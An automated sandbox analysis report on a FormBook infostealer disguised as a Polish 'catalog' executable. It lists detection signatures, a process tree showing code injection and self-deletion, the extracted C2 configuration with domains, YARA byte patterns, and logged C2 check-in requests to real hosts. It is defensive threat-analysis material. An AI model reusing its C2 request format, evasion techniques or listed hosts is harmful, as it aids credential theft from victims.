Windows Analysis Report nowy przyk#U0142adowy katalog.exe

Overview

General Information

Sample Name: nowy przyk#U0142adowy katalog.exe
Analysis ID: 515499
MD5: cbe0e49106fad96b2c1c155ce5b22abd
SHA1: 25a9a38c80446b631fc1de30440caba41ff8ec74
SHA256: a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • nowy przyk#U0142adowy katalog.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
    • nowy przyk#U0142adowy katalog.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: CBE0E49106FAD96B2C1C155CE5B22ABD)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5596 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5632 cmdline: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bezhantrading.com/wtcv/"], "decoy": ["snowwisdom.com", "metaverseforecast.com", "mbc2digital.net", "palmspringsgolfacademy.com", "ff4cdhffx.xyz", "webdailysports.com", "alles-abgedeckt.com", "dempseynutrition.com", "egicsac.com", "nutrioclinic.com", "applebroog.industries", "trup.club", "937451.com", "cococutiecosmetics.store", "purwojati.com", "qeefame.com", "wbtqfuck.xyz", "huazhansat.com", "harada-insatsu.com", "thankugreece.com", "matthewandjessica.com", "giusepperosafio.com", "mhtqph.club", "clickcopywriting.com", "pausupport.com", "iccsukltd.com", "dtechmagento.com", "cplbet168.xyz", "leads-mania.club", "clairebuildsonline.com", "americanvisionvinyl.com", "ningyue.xyz", "cyfercode.com", "jasonjasura.com", "perspectiveofthepalm.com", "goodneighborurgentcare.com", "umityasarengin.com", "6016011.com", "percentrostered.com", "braveget.com", "skphoolmakhana.com", "uso4.com", "i7saan.com", "anderlecht.immo", "lurkingfilms.net", "affiliatemarketingproducts.xyz", "latiquecm.com", "tankomixing.com", "fatmochi.com", "terrisercovich.com", "melhoresdomessempretemm.com", "refugelarpsanfransico.com", "worryterrible.space", "0chong2.net", "bundleco.top", "lelegianstudies.com", "mreux.com", "charxprime.com", "sddn13.xyz", "luckychoice.net", "pluspace.com", "ibizguide.com", "lmdang.com", "rastipponmkh.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: CMSTP Execution Process Creation
          Source: Process started, Author: Nik Seetharaman, Data: Command: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 5596, ProcessCommandLine: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe", ProcessId: 5632

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: nowy przyk#U0142adowy katalog.exe, ReversingLabs: Detection: 29%
          Yara detected FormBook
          Source: Yara match, File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URL
          Source: bezhantrading.com, Virustotal: Detection: 5%
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll, ReversingLabs: Detection: 13%
          Machine Learning detection for sample
          Source: nowy przyk#U0142adowy katalog.exe, Joe Sandbox ML: detected
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, Avira: Label: TR/Patched.Ren.Gen2
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.cmstp.exe.4b5796c.4.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpack, Avira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpack, Avira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpack, Avira: Label: TR/Patched.Ren.Gen2
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.cmstp.exe.3bbc28.1.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: nowy przyk#U0142adowy katalog.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 0_2_10002F80 lstrcpyW,lstrlenW,lstrcpyW,lstrcatW,FindFirstFileW,wsprintfW,_GetThemeDocumentationProperty@16,_GetThemeDocumentationProperty@16,FindNextFileW,FindClose,0_2_10002F80
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 4x nop then pop esi, 1_2_00415854
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 4x nop then pop edi, 1_2_004162C4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 4x nop then pop esi, 1_1_00415854
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, Code function: 4x nop then pop edi, 1_1_004162C4
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop edi, 11_2_029762C4
          Source: C:\Windows\SysWOW64\cmstp.exe, Code function: 4x nop then pop esi, 11_2_02975854

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49773 -> 153.127.214.206:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Network Connect: 104.248.163.187 80
          Source: C:\Windows\explorer.exe, Domain query: www.tankomixing.com
          Source: C:\Windows\explorer.exe, Domain query: www.leads-mania.club
          Source: C:\Windows\explorer.exe, Network Connect: 217.160.0.33 80
          Source: C:\Windows\explorer.exe, Domain query: www.bezhantrading.com
          Source: C:\Windows\explorer.exe, Domain query: www.americanvisionvinyl.com
          Source: C:\Windows\explorer.exe, Network Connect: 46.38.243.234 80
          Source: C:\Windows\explorer.exe, Domain query: www.iccsukltd.com
          Source: C:\Windows\explorer.exe, Network Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exe, Domain query: www.affiliatemarketingproducts.xyz
          Source: C:\Windows\explorer.exe, Network Connect: 153.127.214.206 80
          Source: C:\Windows\explorer.exe, Network Connect: 138.68.74.116 80
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Network Connect: 172.67.184.156 80
          Source: C:\Windows\explorer.exe, Domain query: www.worryterrible.space
          Source: C:\Windows\explorer.exe, Domain query: www.alles-abgedeckt.com
          Source: C:\Windows\explorer.exe, Domain query: www.dempseynutrition.com
          Source: C:\Windows\explorer.exe, Domain query: www.harada-insatsu.com
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe, DNS query: www.affiliatemarketingproducts.xyz
          Source: DNS query: www.sddn13.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.bezhantrading.com/wtcv/
          Source: Joe Sandbox View, ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox View, ASN Name: SAKURA-ASAKURAInternetIncJP SAKURA-ASAKURAInternetIncJP
          Source: global traffic, HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1 Host: www.worryterrible.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.americanvisionvinyl.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1 Host: www.iccsukltd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.harada-insatsu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.affiliatemarketingproducts.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.bezhantrading.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1 Host: www.alles-abgedeckt.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.leads-mania.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1 Host: www.tankomixing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 04 Nov 2021 10:49:10 GMT Content-Type: text/html Content-Length: 275 ETag: "6182ae77-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 04 Nov 2021 10:49:15 GMT Content-Type: text/html Content-Length: 275 ETag: "6182b3d6-113" Via: 1.1 google Connection: close Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 04 Nov 2021 10:48:29 GMT Server: Apache/2.4.10 (Debian) Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.alles-abgedeckt.com Port 80</address></body></html>
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 04 Nov 2021 10:50:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2963 Connection: close x-wix-request-id: 1636023003.449130355506120675 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Data Ascii: <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robo
          Source: cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmp, String found in binary or memory: http://browsehappy.com/
          Source: nowy przyk#U0142adowy katalog.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: nowy przyk#U0142adowy katalog.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknown, DNS traffic detected: queries for: www.worryterrible.space
          Source: global traffic HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1 Host: www.worryterrible.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.americanvisionvinyl.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1 Host: www.iccsukltd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.harada-insatsu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.affiliatemarketingproducts.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1 Host: www.bezhantrading.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA== HTTP/1.1 Host: www.alles-abgedeckt.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
